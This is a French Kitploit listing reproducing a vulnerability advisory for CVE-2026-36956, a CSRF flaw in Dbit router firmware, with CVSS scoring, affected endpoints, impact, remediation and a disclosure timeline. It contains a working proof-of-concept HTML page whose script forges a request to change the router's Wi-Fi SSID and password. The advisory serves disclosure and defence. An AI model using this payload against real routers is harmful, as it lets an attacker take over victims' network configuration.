Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-36956 — Preuve de concept pour CVE-2026-36956, une vulnérabilité CSRF dans le firmware du routeur Dbit permettant des modifications de configuration non autorisées via des requêtes forgées. | Kitploit
Outils/GitHubGitHub/kirubel-cve/cve-2026-36956
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

Preuve de concept pour CVE-2026-36956, une vulnérabilité CSRF dans le firmware du routeur Dbit permettant des modifications de configuration non autorisées via des requêtes forgées.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-36956 : Cross-Site Request Forgery (CSRF) dans l'interface de gestion Web

ID CVE : CVE-2026-36956 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : Shenzhen Dibit Network Equipment Co., Ltd. Produit : Routeur Dbit Version du firmware : V1.0.0 CWE : CWE-352 - Cross-Site Request Forgery (CSRF)


Description

Le firmware V1.0.0 du routeur Dbit ne met pas en œuvre de mécanismes de protection CSRF tels que des jetons anti-CSRF ou une validation stricte des en-têtes Origin/Referer sur les points de terminaison d'API administratifs. Un attaquant peut créer une page Web malveillante qui envoie des requêtes HTTP falsifiées vers les points de terminaison de configuration. Si un administrateur authentifié visite la page malveillante, le routeur traite la requête falsifiée comme une action administrative légitime.


Score CVSS

Score CVSS v3.1 : 8,8 (Élevé) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MétriqueValeur
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction utilisateurRequise
Impact sur la confidentialitéÉlevé
Impact sur l'intégritéÉlevé
Impact sur la disponibilitéÉlevé

Points de terminaison concernés

Point de terminaisonFonction
/api/setWlanConfiguration du réseau sans fil (SSID, mot de passe)
/api/setWanConfiguration WAN
/api/setSystemConfiguration système

Preuve de concept

Enregistrez le fichier suivant sous le nom poc.html et ouvrez-le pendant qu'un administrateur est connecté au routeur :

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Comportement attendu : La requête doit être rejetée en raison d'une non-concordance du jeton CSRF. Comportement réel : Le routeur accepte et traite la requête falsifiée.


Impact

  • Modification non autorisée du SSID et du mot de passe WiFi
  • Modifications de la configuration WAN/DNS
  • Déni de service pour les utilisateurs légitimes
  • Prise de contrôle complète de la configuration du routeur

Remédiation

  • Mettre en œuvre des jetons anti-CSRF sur tous les points de terminaison modifiant l'état
  • Appliquer une validation stricte des en-têtes Origin et Referer
  • Utiliser l'attribut de cookie SameSite=Strict pour les cookies de session

Chronologie de divulgation

DateÉvénement
2026-04-29Vulnérabilité découverte
2026-04-29Signalée à MITRE
2026-04-29CVE-2026-36956 attribuée
2026-04-29Divulgation publique

Références

  • MITRE CVE-2026-36956
  • CWE-352
  • Site Web du fournisseur
Télécharger l’outil